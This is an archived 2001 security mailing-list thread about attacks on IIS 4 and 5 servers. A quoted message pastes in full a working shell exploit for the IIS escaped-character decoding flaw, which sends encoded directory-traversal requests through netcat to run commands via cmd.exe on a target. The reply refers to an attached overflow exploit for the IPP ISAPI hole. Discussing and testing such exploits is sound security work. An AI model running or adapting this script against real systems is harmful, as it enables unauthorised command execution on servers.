RE: Hacked NT/2K box

From: Sam Wilson (swilson@numbsafari.com)
Date: 07/25/01 

Date: Tue, 24 Jul 2001 20:04:40 -0400 (EDT)
From: Sam Wilson <swilson@numbsafari.com>
To: H C <keydet89@yahoo.com>
Subject: RE: Hacked NT/2K box
Message-ID: <Pine.BSO.4.10.10107241959300.29503-200000@mail.numbsafari.com>

Sorry about that. I was thinking of the wrong exploit. The previous
exploit I mentioned DOES give you the ability to execute arbitrary command
line statements and see the output (which is only marginally useful, but
nasty nonetheless). However, it does effect IIS 4 and IIS 5.

The one I was thinking about effects only IIS 5 with Internet Printing
Protocol enabled. By using Jill.c (attached), you can get the remote
console thing working. Please reference BugTraq ID # 2674 ("Microsoft
Windows 2000 IIS 5.0 IPP ISAPI 'Host:' Buffer Overflow Vulnerability").
The exploit is from "dark spyrit".

Sam Wilson
Software Engineer
ECount, Inc.

On Tue, 24 Jul 2001, H C wrote:

> Sam,
>
> Looking through the script you posted, I don't see how
> it's able to obtain a remote shell from a Unix system.
> I can see how it's simply passing the extended
> Unicode URL to the web server, by piping it through
> netcat. However, there is no unusual or special code
> added...about all you would expect to see back is a
> directory listing if the target server is vulnerable.
>
>
> Can you point out the part in the script that allows
> one to obtain a remote shell on the target?
>
> thanks
>
> --- Sam Wilson <swilson@numbsafari.com> wrote:
> > I'm not sure if you remember this exploit from back
> > in May, but essentially,
> > using a UNIX box you can obtain a remote console on
> > an effected Win2K box.
> > Without reading the script again or spending too
> > many brain cycles on
> > remembering the details I believe the exploit does
> > *NOT* require having
> > RConsole or Terminal services installed on the
> > victim.
> >
> > The Exploit has bugtraq ID 2708 and is titled "MS
> > IIS/PWS Escaped Characters
> > Decoding Command Execution Vulnerability". A
> > gentleman by the name of "Leif
> > Jakob <bugtraq@jakob.weite-welt.com> has provided
> > the 'IIS_escape_test.sh'
> > exploit." I've pasted my copy of the script below my
> > sig.
> >
> > We never experienced this attack in the wild,
> > however we did use the exploit
> > in a test environment to confirm it. It works.
> > Rather nicely, actually.
> >
> > Hope that helps.
> >
> > Sam Wilson
> > Software Engineer
> > swilson@ecount.com
> >
> > ---------------------
> > #!/bin/sh
> >
> > # Copyright 2001 by Leif Jakob
> > <bugtraq@jakob.weite-welt.com>
> > #
> > # do not abuse this code... blah blah :)
> >
> > if [ -z "$1" ] ; then
> > echo "usage:"
> > echo "$0 hostname"
> > exit 1
> > fi
> >
> > host="$1"
> >
> > NETCAT=`which netcat`
> >
> > if [ -z "$NETCAT" ] ; then
> > NETCAT=`which nc`
> > fi
> >
> > if [ -z "$NETCAT" -o ! -x "$NETCAT" ] ; then
> > echo "you need netcat to make this work"
> > exit 1
> > fi
> >
> > echo "using netcat:$NETCAT"
> >
> > function makeRequest
> > {
> > host="$1"
> > count=$2
> > cmd="$3"
> > echo -n 'GET /scripts/'
> > while [ $count -gt 0 ] ; do
> > echo -n '..%255c'
> > count=$((count-1))
> > done
> > echo -n 'winnt/system32/cmd.exe?/c+'
> > echo -n "$cmd"
> > echo ' HTTP/1.0'
> > echo "Host: $host"
> > echo ''
> > echo 'dummy'
> > }
> >
> > function testHost
> > {
> > host="$1"
> > count=10 # you can't overdo it
> > cmd='dir+c:\'
> > makeRequest "$host" "$count" "$cmd" | netcat -w
> > 4 $host 80
> > }
> >
> > testHost "$host"
> >
>
>
> __________________________________________________
> Do You Yahoo!?
> Make international calls for as low as $.04/minute with Yahoo! Messenger
> http://phonecard.yahoo.com/
>

Relevant Pages

  • Re: ModuleBased CMS alfa 1 Multiple Remote File Inclusion
    ... +discripton:MBCMS (ModuleBased CMS) is a new CMS designed for ease of use ... headers, paths, and script locations. ... Since I have no IIS for tests at the ... to see the vulnerability in IIS and not in PHP or the ...
    (Bugtraq)
  • Re: Secured IIS Project - IIS 4.0 Secure Script
    ... Secured IIS Project - IIS 4.0 Secure Script ... Machines which were upgraded from IIS 2.0 (original NT installation), ... Remove FTP Service ...
    (NT-Bugtraq)
  • Re: INETINFO and ASP Trouble
    ... seeing many IIS and ASP errors in the event log, ... > Event Type: Error ... > Event Source: Service Control Manager ... IIS log failed to write entry, Script timed out. ...
    (microsoft.public.inetserver.iis)
  • Re: Webservice to an Out of process server
    ... I've create a COM server in VFP which I try to access from a Webservice ... If you want to run executables on IIS from a script (i.e. an ASP, ASP.Net, ... well as Web Service Extension for the appropriate Script Engine. ...
    (microsoft.public.inetserver.iis.security)
  • Re: IIS 4.0 DOS attack?
    ... Subject: IIS 4.0 DOS attack? ... patch distribution script we use (exploded hotfixes applied through ... a lot of our servers were fine -- we just ...
    (Focus-Microsoft)